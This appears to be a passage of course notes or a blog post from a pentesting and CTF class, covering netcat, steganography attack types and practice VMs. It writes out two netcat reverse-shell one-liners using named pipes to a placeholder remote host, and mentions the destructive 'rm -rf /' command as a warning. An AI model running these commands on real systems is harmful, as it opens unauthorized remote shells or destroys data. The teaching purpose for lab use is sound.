- The original GIF (sourced from https://www.youtube.com/watch?v=TIfAkOBMf5A)
- Don’t actually run rm -rf / on your box.
- If you want find out what happens, google for the Unix Recovery Legend (a copy of it is hosted here: http://www.ee.ryerson.ca/~elf/hack/recovery.html)
- (these don’t seem to be for sale any longer. If you’re reading this after Rand Paul’s inevitable defeat in the Republican primaries, then they’re definitely not for sale)
- Netcat is a tool you will need to get very comfortable with as a pentester. Netcat is a simple but powerful utility that will allow you to listen on or transmit data over TCP or UDP ports. It’s built into almost every Linux or Unix OS (including OS X) and versions are availble for Windows and other OS’s too.
- Some of the popular clones of netcat include ncat (which is part of the Nmap Project and comes bundled with it), socat, CryptCat (which can SSL-encrypt your traffic), and many others
- Steganography is one of those things you learn in security classes and is fun for hacker CTFs…but I’m not really sure how much it gets used by real attackers. Or even pentesters on engagements, for that matter.
- Stego-only attack: you only have the medium with the hidden data in it
- Known-cover attack: you have a copy of the original medium BEFORE data was hidden in it and a copy of it AFTER data is hidden
- Known-message attack: you have the medium with hidden data in it and you know what the hidden message is (can determine the steg algorithm with this info)
- Known-stego attack: you know the steg method used and you have access to the original and modified medium
- Chosen-stego attack: you have access to different steg tools and you try each them and look for similarities to determine which method was used for the file you’re analysing
- Chosen-message attack: similar to the above, but using the same message in different tools to look for patterns or signatures
- The process might get far along, but eventually the program being used to trash the disk will delete itself and stall out, so there will still be something for forensic investigators to pick at…though who knows just what will remain.
- Also, besides the netcat man page, there are some good recipes buried in the /usr/share/doc/netcat-traditional/ directory on Kali. Check out README.Debian and README.gz. Also, there are some very interesting shell scripts that use netcat to do everything from IRC to acting as a crude web server down in the examples subdirectory.
- Besides all the different variants, there are two mainstream versions of netcat: netcat-traditional and netcat-openbsd. The netcat-openbsd is the most common version you’ll find that comes installed on Debian, Ubuntu, Redhat, and various other Linux distributions. The main difference is that the OpenBSD variant has had the “-e” option removed, as a measure to prevent hackers leaving backdoors.
- Fortunately, there are two different options for sending out a reverse shell without having to use the “-e” flag:
1.) mknod backpipe p && nc <remote server> <port> 0<backpipe | /bin/bash 1>backpipe
2.) mkfifo pipe && nc <remote serve> <port> < pipe | /bin/bash &> pipe <——– this one is better, because it will also pipe stderr to you (so you can see error messages)
This is the point in the class where I would start doing actual CTF challenges with the students. What I usually did was create several VMs on the class server (I didn’t need much horsepower; an old laptop running Linux Mint with about 4GB of RAM sufficed just fine) and assign one to each student for them to hack. I had pretty small classes, so I this was doable. I would give them hints, answer questions, guide them in the right direction, get them to help each other out, etc. until they finally solved it.
But for you reading along at home, you should now know enough to try to tackle some of these CTF VMs yourself. Here are the first few I started them out on:
You can easily download the ISO images and run them in VMware or VirtualBox. I urge to try to solve them on your own. The De-ICE ones do have a hint page in the target machine’s website. If you get really desperate, you can always look at the walkthroughs on their respective VulnHub pages.